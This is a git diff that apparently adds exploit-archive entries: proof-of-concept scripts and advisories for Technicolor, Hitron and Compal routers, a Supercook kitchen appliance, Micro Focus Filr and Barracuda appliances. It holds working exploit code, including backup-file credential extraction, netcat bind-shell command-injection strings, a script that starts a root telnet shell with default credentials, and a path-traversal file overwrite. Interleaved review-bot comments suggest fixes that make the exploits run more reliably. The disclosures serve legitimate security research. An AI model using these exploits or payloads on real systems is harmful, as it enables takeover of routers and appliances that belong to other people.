create and download backup file (auth required) + u.createBackupFile('Configuration_file.cfg') +# parse downloaded file and get admin and backup file password +u.parseBackupFile('Configuration_file.cfg') +# execute shell command in the router +if (u.restoreConfigFile()): + print 'Shell installed' + u.getShellResponse() +else: + print 'Shell install failed' \ No newline at end of file diff --git a/platforms/cgi/webapps/40157.py b/platforms/cgi/webapps/40157.py new file mode 100755 index 000000000..87cf1df63 --- /dev/null +++ b/platforms/cgi/webapps/40157.py 
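Review bot: The argument check at the bottom of the file prints the usage line but never exits, so a run with no arguments falls through to `addr = sys.argv[1]` and dies with an IndexError instead of the usage message; add `sys.exit(1)` after that `print`. `parseBackupFile` ignores its `fname` parameter and opens the hard-coded `"Configuration_file.cfg"`, and neither that tarfile nor the `open(fname, 'wb')` in `saveBackup` is closed on the error path — use `with tarfile.open(fname, "r:gz") as tar:` and `with open(fname, 'wb') as f:`. `parseNVRam` also unpacks `nv[o:o+2]` and `nv[o+2:o+4]` without checking that four bytes remain, so a truncated or malformed backup raises struct.error rather than returning the partial table, and `nvdata[3]` in the caller raises KeyError when that entry is absent. The file is marked 100755 but has no interpreter line and relies on Python 2 `print` statements, so a `#!/usr/bin/env python2` shebang before the module docstring would record the runtime it actually needs. The same missing `sys.exit(1)` and missing shebang appear in the 40157.py hunk below.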
@@ -0,0 +1,130 @@ +''' +Technicolor TC7200 modem/router multiple vulnerabilities +-------------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Technicolor TC7200, STD6.02.11 +- Product page: http://www.technicolor.com/en/solutions-services/connected-home/broadband-devices/cable-modems-gateways/tc7200-tc7300 + +Vulnerabilities +--------------- +Insecure session management + +The web interface does not use cookies at all and does not check the IP +address of the client. If admin login is successful, every user from the +LAN can access the management interface. + +Backup file encryption uses fix password + +Technicolor fixed the CVE-2014-1677 by encrypting the backup file with +AES. However, the encrypted backup file remains accessible without +authentication and if the password is not set in the web interface a +default password is used. So, if an attacker accesses the backup file +without authentication, the password cannot be set, and the backup file +can be decrypted. + +Timeline +-------- + +- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC +- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings +- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. +- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. 
+ +POC +--- +POC script is available to demonstrate the following problems [2]: +- Unauthenticated backup file access +- Backup file decryption + +Recommendations +--------------- +Since only the ISP can update the firmware, we can recommend for users +to change the WiFi passphrase. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt +from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 +[2] https://github.com/ebux/Cable-modems/tree/master/Technicolor +''' +# +# POC code for Technicolor TC7200 +# +# Demonstrates the following vulnerabilities +# - Unauthenticated backup file access +# - Backup file decryption +# +# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu) +# +# Advisory: http://www.search-lab.hu/advisories/secadv-20150720 + +import sys +import requests +import struct +import binascii +from Crypto.Cipher import AES + +class technicolor: + def __init__(self, addr, port): + self.addr = addr + self.port = port + self.s = requests.Session() + + def getUri(self, uri): + return 'http://%s:%d/%s'%(self.addr,self.port,uri) + + def downloadBackupFile(self): + r = self.s.get(self.getUri('goform/system/GatewaySettings.bin')) + resp = '' + for chunk in r: + resp += chunk + return resp + + def parseBackup(self, backup): + p = backup.find('MLog') + if (p > 0): + p += 6 + nh = struct.unpack('!H',backup[p:p+2])[0] + name = backup[p+2:p+2+nh] + p += 2+nh + ph = struct.unpack('!H',backup[p:p+2])[0] + pwd = backup[p+2:p+2+nh] + return (name,pwd) + return ('','') + + def decryptBackup(self, backup): + key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F') + l = (len(backup)/16)*16 + cipher = AES.new(key, AES.MODE_ECB, '\x00'*(16)) + plain = cipher.decrypt(backup[0:l]) + return plain + + +#------------------------------------ + +if (len(sys.argv) < 2): + print 'technicolor_tc7200_poc.py addr [port]' +addr = 
sys.argv[1] +port = 80 +if (len(sys.argv) == 3): + port = int(sys.argv[2]) + +# create technicolor object +t = technicolor(addr, port) + +backup = t.downloadBackupFile() +if (len(backup) > 0): + open('test.enc', 'wb').write(backup) + plain = t.decryptBackup(backup) + open('test.dec', 'wb').write(plain) + + (name, pwd) = t.parseBackup(plain) + if (name != ''): + print 'admin name: %s, pwd: %s'%(name,pwd) diff --git a/platforms/hardware/webapps/40158.txt b/platforms/hardware/webapps/40158.txt new file mode 100755 index 000000000..9becf86d3 --- /dev/null +++ b/platforms/hardware/webapps/40158.txt 
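Review bot: `parseBackup` reads the password length into `ph` but then slices with the name length, `pwd = backup[p+2:p+2+nh]`, so the returned password is wrong whenever the two lengths differ; it should be `pwd = backup[p+2:p+2+ph]`. `decryptBackup` passes an IV argument to `AES.new(key, AES.MODE_ECB, '\x00'*(16))` although ECB takes none — PyCrypto ignores it, but it misleads the reader into assuming a chained mode and a newer AES implementation may reject it, so `cipher = AES.new(key, AES.MODE_ECB)` is the intended call; likewise `len(backup)/16` only truncates under Python 2 integer division and `//` would make that explicit. The two `open(..., 'wb').write(...)` calls in the main block never close their handles; wrap them in `with`. As in 40156.py, the usage check prints but does not `sys.exit(1)`, and the 100755 file carries no `#!/usr/bin/env python2` line despite depending on Python 2 `print` statements.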
@@ -0,0 +1,63 @@ +Hitron CGNV4 modem/router multiple vulnerabilities +-------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Hitron CGNV4, 4.3.9.9-SIP-UPC +- Product page: http://www.hitrontech.com/en/cable_detail.php?id=62 + +Vulnerabilities +--------------- +Insecure session management + +The web interface uses insecure cookies, which can be brute-forced +easily (e.g cookie: userid=0). If admin login is successful, the IP +address of the admin user is stored and everybody can access the +management interface with the same IP. + +Missing CSRF protection + +The web interface is not used any CSRF protection. In case of a valid +session exists, the attacker can modify any settings of the router. If +the default admin password was not changed, the attacker can perform a +login also and modify any settings after it. + +Authenticated command injection + +The ping diagnostic function is vulnerable to system command injection, +because the parameters are checked only at the client side. Using the +following ping target, the attacker can gain local root access to the +device: + +“google.com;nc -l -p 1337 -e /bin/sh;echo”. + +Disclaimer +---------- +We found these vulnerabilities within a very short time range (3 hours), +and we did not check a lot of areas such as: +- Command injections in other modules +- Buffer overflows +- User authentication +- Default SSID and passphrase +- Analysis of the backup file +- Device configuration (such as SNMP) + +Timeline +-------- +- 2015.10.16: Vulnerabilities found in the Hitron CGNV4 were reported to UPC Magyarorszag and Liberty Global +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. 
+- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +Recommendations +--------------- +We do not know about any possible solution. Firmware update should +install the ISP after the fix will be ready. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt +from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 \ No newline at end of file diff --git a/platforms/hardware/webapps/40159.txt b/platforms/hardware/webapps/40159.txt new file mode 100755 index 000000000..737da1ad5 --- /dev/null +++ b/platforms/hardware/webapps/40159.txt 
@@ -0,0 +1,75 @@
+Compal CH7465LG-LC modem/router multiple vulnerabilities
+--------------------------------------------------------
+
+The following vulnerabilities are the result of a quick check (~3 hours)
+of the Mercury modem. We performed a systematic and deeper evaluation of
+this device also, which result will be described in a separate report [2] and advisory.
+
+Platforms / Firmware confirmed affected:
+- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH
+
+Vulnerabilities
+---------------
+Insecure session management
+
+The web interface uses cookies, but is not verified. Thus, if admin
+login is successful, the IP address and the browser type of the admin
+user are stored and everybody can access the management interface with
+the same IP and the same user-agent.
+
+Information leakage
+
+Some information requests can be performed without authentication. For
+example an attacker can obtain the following information pieces:
+- Global settings (SW version, vendor name, etc.)
+- CSRF token
+- Event log
+- LAN user table
+- Ping response
+
+Unauthenticated deny of service attack
+
+Factory reset can be initiated without authentication with a simple POST
+request to the getter.xml.
+
+Unauthenticated configuration changes
+Some settings modification can be performed without authentication, for
+example the first install flag and the ping command.
+
+Unauthenticated command injection
+
+The ping diagnostic function is vulnerable to system command injection,
+because parameters are checked only at the client side. Using the
+following ping target, the attacker can gain local root access to the
+device:
+
+“token=&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc
+-l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1”
+
+Timeline
+--------
+- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag
+- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device
+- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device.
+- 2015.10.24: A proposal was sent to Liberty Global.
+- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation.
+- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China.
+- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received.
+- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)”
+- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB
+- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
+- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
+- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
+
+Recommendations
+---------------
+We do not know about any possible solution. Firmware update should install the ISP after the fix will be ready.
+
+Credits
+-------
+This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
+
+References
+----------
+[1] http://www.search-lab.hu/advisories/secadv-20160720
+[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf
\ No newline at end of file
diff --git a/platforms/hardware/webapps/40160.py b/platforms/hardware/webapps/40160.py
new file mode 100755
index 000000000..a8c398b4a
--- /dev/null
+++ b/platforms/hardware/webapps/40160.py
@@ -0,0 +1,268 @@
+'''
+Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities
+
+Reported By:
+==================================
+James McLean -
+ Primary: james dot mclean at gmail dot com
+ Secondary: labs at juicedigital dot net
+
+Device Overview:
+==================================
+From http://www.supercook.me/en/supercook/articles/btmkm800x/
+
+"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional
+kitchen machine. It has 13 functions so not only saves a huge amount of
+time, it also incorporates the Yumi control module and its own recipe
+collection, making it incredibly easy to use."
+
+Vulnerability Overview:
+==================================
+ Vuln1) Weak Username/Password for 'root' account.
+ Vuln2) Information disclosure, unauthenticated.
+ Vuln3) Remote arbitrary code execution.
+
+CVE ID's
+==================================
+None assigned as yet.
+
+Disclosure Timeline
+==================================
+2016-06-01: Vulnerability assessment commenced.
+2016-07-04: Contacted Supercook.me support via Web Contact. No response.
+2016-07-12: Contacted Supercook.me support via Web Contact. No response.
+2016-07-12: Contacted Supercook Australia via Facebook. Supercook responded, saying they will view the support request. No further response recieved.
+2016-07-19: Contacted Supercook Australia via Facebook. No response.
+2016-07-21: Posted security assessment to vortex.id.au.
+2016-07-22: Mitre contacted, CVE ID's requested.
+
+It is with regret, but ultimately due to my concern for the community
+that own these devices, that due to lack of communication I am disclosing
+these vulnerabilities without the involvment of the vendor. I sincerely hope
+that the vendor can resolve these issues in a timely manner.
+
+I intend no malice by releasing these vulnerabilities, and only wish to
+inform the community so appropriate steps may be taken by the owners of
+these devices.
+
+Due to the nature of the firmware on the device, these issues are not likely
+caused by the vendor themselves.
+
+Please do not use the information presented here for evil.
+
+Affected Platforms:
+==================================
+Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.
+Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as
+same firmware is used.
+
+As the Wi-fi Yumi firmware appears to be based on a stock firmware image
+used on a number of other commodity 'IoT' devices, the vulnerabilities
+described here are very likely to affect other devices with similar or
+the same firmware.
+
+--
+
+Vuln1 Details:
+==================================
+Weak Username/Password for Root-level account.
+Username: super
+Password: super
+
+These credentials provide access to the built in FTP server and web
+administration interface. We did not attempt any more than a cursory
+connection to the FTP server with these details.
+
+According to the details disclosed in Vuln2, an additional account is present
+on the device with the following credentials:
+Username: admin
+Password: AlpheusDigital1010
+
+With the exception of a cursory check of the built in FTP service (which
+failed for these credentials), we did not attempt to access the device with
+these credentials.
+
+Vuln1 Notes:
+==================================
+We did not attempt to change or ascertain if it was possible to change these
+access credentials; as Vuln2 completely negates any change made.
+
+Vuln1 Mitigation:
+==================================
+Isolate the Supercook Wi-fi Yumi from any other Wireless network.
+Revert to the non-wifi Yumi controller.
+
+--
+
+Vuln2 Details:
+==================================
+Information disclosure, unauthenticated.
+
+Device URL: http://10.10.1.1/Setting.chipsipcmd
+
+The device offers, via its built in webserver, a full list of all configuration
+parameters available. This list includes the above mentioned root account
+username and password, and the password to the parent connected wifi network.
+All details are in plain text, and transmitted in the format of a key-value
+pair making retrieval, recovery and use of all configuration
+information trivial.
+
+This interface is also available from the parent wi-fi network via DHCP assigned
+IPv4 address.
+
+Vuln2 Notes:
+==================================
+Example data returned:
+DEF_IP_ADDR=10.10.1.1
+DEF_SUBNET_MASK=255.255.255.0
+...
+DEF_SUPER_NAME="super"
+DEF_SUPER_PASSWORD="super"
+DEF_USER_NAME="admin"
+DEF_USER_PASSWORD="AlpheusDigital1010"
+...
+
+Vuln2 Mitigation:
+==================================
+Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using
+the mobile application to upload recipes, then disconnect from the device and
+connect your mobile device to a trusted network once again to access the
+internet once again.
+
+Revert to the non-wifi Yumi controller.
+
+The vendor should establish a method of authentication to the device from the
+various mobile applications available, and transport any configuration in an
+encrypted format using keys which are not generally available or easily
+discoverable.
+
+--
+
+Vuln3 Details:
+==================================
+Remote arbitrary code execution.
+
+Device URL: http://10.10.1.1/syscmd.asp
+
+The device offers a built-in web-shell which, once authenticated using the
+details discovered in Vuln2, allows the execution of any command the device
+can execute - as the built in webserver runs as the root user.
+
+It is possible to execute a command using this interface that would create
+any file in any location. This would allow an attacker to establish persistence.
+
+Additionally, the built in busybox binary includes the option
+'telnetd', meaning it is
+possible to execute the relevant command to start a telnet daemon remotely.
+The running daemon then requires no authentication to connect, and runs as
+the root account.
+
+Vuln3 Mitigation:
+==================================
+Isolate the Supercook Wi-fi Yumi from any other Wireless network.
+
+Revert to the non-wifi Yumi controller.
+
+Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please
+mind your warranty if you modify the files on the device).
+
+The vendor should disable any and all commands on the device and scripts in
+the web interface which are not specifically required for the normal
+functionality of the device or its communication with control apps.
+
+In this instance, the vendor should REMOVE the page '/syscmd.asp' and also
+/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent
+arbitrary commands from being executed.
+
+Additionally, busybox should be recompiled such that the 'telnetd' option is
+no longer available to be executed.
+
+--
+
+Vuln1/Vuln2/Vuln3 Risks:
+==================================
+Weak and easily discoverable root credentials combined with easily accessed
+remote shell functionality is a dangerous combination. These vulnerabilities
+could allow any sufficiently advanced malware to become persistent in a LAN
+and re-infect hosts at will (advanced crypto-locker style malware comes to
+mind), capture and exfiltrate data on either Wireless network the device is
+connected to, MITM any traffic routed through the device, or other as yet
+unknown attack vectors.
+
+Additionally, as full root access is easily obtainable, it may be possible
+for an attacker to cause the cooking functionality to behave erratically or
+possibly even dangerously due to the built in spinning blades and heating
+elements. While we ultimately did not attempt to control these aspects of the
+device due to the fact that it makes our dinner most nights, these risks are
+worth raising.
+
+This vulnerability assessment should not be considered an exhaustive list
+of all vunlnerabilities the device may have. Due to time constraints we were
+unable to invest the required time to discover and document all issues. Due to
+the nature of the firmware on the device, most of these have likely been
+discovered in other products at various times, this item may even duplicate
+another from a similar device.
+
+Notes:
+==================================
+No security assessment of code used for control of cooker functionality was
+undertaken; as this does not, in my opinion, rate as seriously as the other
+vulnerabilities discovered and disclosed here. However, it should be noted,
+that with the root access that is VERY easily obtained, it may be possible for
+an attacker to cause the cooking functionality of the machine to behave
+erratically or even dangerously due to the built in spinning blades and heating
+elements. Further to this, a malicious partner or offspring may intentionally
+sabotage dinner, if he/she would prefer to eat takeout.
+
+No attempt was made to connect to or manipulate files on the built in Samba
+shares, however given the weak credentials sufficiently advanced malware may be
+able to use these shares to establish persistence.
+
+The 'Bellini' name may be regional, our device was procured in Australia and
+as such may or may not have a different name in other countries.
+
+A full, detailed, rundown and commentary is available at
+https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/
+
+Vuln3 Proof of Concept:
+==================================
+'''
+
+#!/usr/bin/env python
+
+import urllib
+import urllib2
+from subprocess import call
+
+# Connect to the device's wifi network, then run.
+# Root access will be provided.
+
+url = 'http://10.10.1.1/goform/formSysCmd'
+cmd = 'busybox telnetd -l /bin/sh'
+username = 'super'
+password = 'super'
+
+# setup the password handler
+basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()
+basicauth.add_password(None, url, username, password)
+
+authhandler = urllib2.HTTPBasicAuthHandler(basicauth)
+opener = urllib2.build_opener(authhandler)
+
+urllib2.install_opener(opener)
+
+# Connect to the device, send the data
+values = {
+ 'sysCmd': cmd,
+ 'apply': 'Apply',
+ 'submit-url': '/syscmd.asp'
+}
+data = urllib.urlencode(values)
+pagehandle = urllib2.urlopen(url, data)
+
+# Connect to Telnet.
+call(["telnet","10.10.1.1"])
+
+# Pwnd.
+
+# End of document.
\ No newline at end of file
diff --git a/platforms/java/webapps/40161.txt b/platforms/java/webapps/40161.txt
new file mode 100755
index 000000000..df7b1ff98
--- /dev/null
+++ b/platforms/java/webapps/40161.txt
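Review bot: The `#!/usr/bin/env python` line sits after the closing `'''` of the module docstring, so it is an ordinary comment rather than a shebang and the file is not directly executable; it belongs on line 1 (the bare `python` interpreter also signals Python 2, which `urllib2` and `urllib.urlencode` confirm — worth stating in the header). `pagehandle = urllib2.urlopen(url, data)` is assigned but never read, so the response is neither inspected nor closed before `call(["telnet","10.10.1.1"])` runs; either drop the assignment or use the handle. The device address `10.10.1.1` is duplicated as a literal in `url` and again in the telnet `call`; hoisting it into one `host` variable keeps the two from drifting apart.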
@@ -0,0 +1,263 @@ +SEC Consult Vulnerability Lab Security Advisory < 20160725-0 > +======================================================================= + title: Multiple vulnerabilities + product: Micro Focus (former Novell) Filr Appliance + vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846 + fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 + CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609 + CVE-2016-1610, CVE-2016-1611 + impact: critical + homepage: https://www.novell.com/products/filr/ + found: 2016-05-23 + by: W. Ettlinger (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Montreal - Moscow + Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"Unlike other mobile file access and collaborative file sharing solutions, Micro +Focus Filr has been designed with the enterprise in mind, resulting in less +administration, better security and more productive users." + +URL: https://www.novell.com/products/filr/ + + +Business recommendation: +------------------------ +During a very quick security check several vulnerabilities with high impact +have been discovered. SEC Consult recommends to immediately apply the patches +provided by Micro Focus to address these issues. + +Please note that since SEC Consult did not conduct a thorough technical security +check SEC Consult cannot make a statement regarding the overall security of the +Micro Focus Filr appliance. + + +Vulnerability overview/description: +----------------------------------- +During a quick security check several vulnerabilities have been identified that +ultimately allow an attacker to completely compromise the appliance: + +1) Cross Site Request Forgery (CSRF) - CVE-2016-1607 +Several functions within the appliance's administative interface lack protection +against CSRF attacks. 
This allows an attacker who targets an authenticated +administrator to reconfigure the appliance. + +2) OS Command Injection - CVE-2016-1608 +The appliance administrative interface allows an authenticated attacker to +execute arbitrary operating system commands. Please note that an attacker can +combine this vulnerability with vulnerability #1. In this scenario, an attacker +does not need to be authenticated. + +3) Insecure System Design +The appliance uses a Jetty application server to provide the appliance +administration interface. This application server is started as the superuser +"root". Please note that combined with vulnerability #1 and #2 an attacker can +run commands as the superuser "root" without the need for any authentication. +For vendor remark on #3 see solution section. + +4) Persistent Cross-Site Scripting - CVE-2016-1609 +The Filr web interface uses a blacklist filter to try to strip any JavaScript +code from user input. However, this filter can be bypassed to persistently +inject JavaScript code into the Filr web interface. + +5) Missing Cookie Flags +The httpOnly cookie flag is not set for any session cookies set by both the +administrative appliance web interface and the Filr web interface. Please note +that combined with vulnerability #4 an attacker can steal session cookies of +both the appliance administration interface and the Filr web interface (since +cookies are shared across ports). +For vendor remark on #5 see solution section. + +6) Authentication Bypass - CVE-2016-1610 +An unauthenticated attacker is able to upload email templates. + +7) Path Traversal - CVE-2016-1610 +The functionality that allows an administrator to upload email templates fails +to restrict the directory the templates are uploaded to. Please note that +combined with vulnerability #6 an attacker is able to upload arbitray files with +the permissions of the system user "wwwrun". 
+ +8) Insecure File Permissions - CVE-2016-1611 +A file that is run upon system user login is world-writeable. This allows a local +attacker with restricted privileges to inject commands that are being executed +as privileged users as soon as they log into the system. Please note that +combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject +commands that are executed as privileged system users (e.g. root) using the Filr +web interface. + + +Proof of concept: +----------------- +1, 2, 3) +The following HTML fragment demonstrates that using a CSRF attack (#1) system +commands can be injected (#2) that are executed as the user root (#3): + +----- snip ----- + + +
+ + + + + + +
+ + +----- snip ----- + +4) +The following string demonstrates how the XSS filter can be circumvented: + + +This string can e.g. be used by a restricted user in the "phone" field of the +user profile. The script is executed by anyone viewing the profile (e.g. admins). + +5) +None of the session cookies are set with the httpOnly flag. + +6, 7, 8) +The following Java fragment demonstrates how an unauthenticated attacker (#6) +can overwrite a file in the filesystem (#7 & #8) that is executed upon user login +of e.g. the root user: + +----- snip ----- +String sessionCookie = "sectest"; +String host = "http:///"; + +ProxySettings settings = new ProxySettings(); +HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie); + +settings.setCookieManager(new CookieManager()); +settings.getCookieManager().getCookieStore().add(new URI(host), cookie); + +settings.setModuleBaseUrl(host + "ssf/gwt/"); +settings.setRemoteServiceRelativePath("gwtTeaming.rpc"); +settings.setPolicyName("338D4038939D10E7FC021BD64B318D99"); +GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings); + +VibeXsrfToken token = new VibeXsrfToken( + StringUtils.toHexString(Md5Utils.getMd5Digest(sessionCookie.getBytes()))); +((HasRpcToken) svc).setRpcToken(token); + +String fileName = "../../../../etc/profile.d/vainit.sh"; +FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l); +fileBlob.setBlobDataString("id > /tmp/profiledtest\n"); +BinderInfo folderInfo = new BinderInfo(); +folderInfo.setBinderId((long) 1); +folderInfo.setBinderType(BinderType.WORKSPACE); +folderInfo.setWorkspaceType(WorkspaceType.EMAIL_TEMPLATES); +VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true); +HttpRequestInfo ri = new HttpRequestInfo(); +svc.executeCommand(ri, cmd); +----- snip ----- + + +Vulnerable / tested versions: +----------------------------- +The version 2.0.0.421 of Micro Focus Filr was found to be vulnerable. 
This version +was the latest version at the time of the discovery. + +According to the vendor, Filr 1.2 is also vulnerable. + + + +Vendor contact timeline: +------------------------ +2016-05-23: Sending encrypted advisory to security@novell.com, Setting latest + possible release date to 2016-07-12 +2016-05-24: Initial response from Micro Focus: forwarded the information to Filr + engineering team +2016-06-13: Micro Focus releases patch to address issue #8 +2016-06-14: Requested status update +2016-06-14: Micro Focus expects release of the patches in early July +2016-06-30: Asking for status update, answer of Micro Focus +2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th +2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus +2016-07-16: Postponing advisory release, patch not yet ready +2016-07-22: Patch release by Micro Focus +2016-07-25: Coordinated advisory release + + +Solution: +--------- +The "Filr 2.0 Security Update 2" can be downloaded here and should +be applied immediately: +https://download.novell.com/Download?buildid=3V-3ArYN85I~ +Those patches fix vulnerabilities #1, #2, #4, #6, #7 + +"Filr 1.2 Security Update 3" can be found here: +https://download.novell.com/Download?buildid=BOTiHcBFfv0~ + + +Knowledge base references at Micro Focus: +Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786 +Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789 +Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787 +Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788 + +Local privilege escalation via insecure file permissions (#8) has +already been fixed in the Filr 2.0 security update 1 in June: +https://www.novell.com/support/kb/doc.php?id=7017689 + + +Issue #3: According to Micro Focus, Jetty actually runs as user +"vabase-jetty" but will pass commands off to another service on +the box that runs as root to perform privileged actions. 
+They have fixed the command injection in this release and the +next release will include much more stringent parameter validation +for passing the commands. + +Issue #5: According to Micro Focus, a component of Filr does not +function properly when the httpOnly flag is enabled. This will be +addressed in a future release. + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Montreal - Moscow +Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/Career.htm + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/About/Contact.htm +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF W. Ettlinger / @2016 \ No newline at end of file diff --git a/platforms/linux/remote/40146.rb b/platforms/linux/remote/40146.rb new file mode 100755 index 000000000..8d9af695d 
--- /dev/null
+++ b/platforms/linux/remote/40146.rb
@@ -0,0 +1,238 @@
+# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit
+# Date: 07/21/16
+# Exploit Author: xort xort@blacksecurity.org
+# Vendor Homepage: https://www.barracuda.com/
+# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
+# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
+# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
+# CVE : None.
+
+
+# vuln: ondefine_modify_admin_role trigger exploit
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
+ by exploiting a vulnerability in the web administration interface. By sending a specially crafted request
+ it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
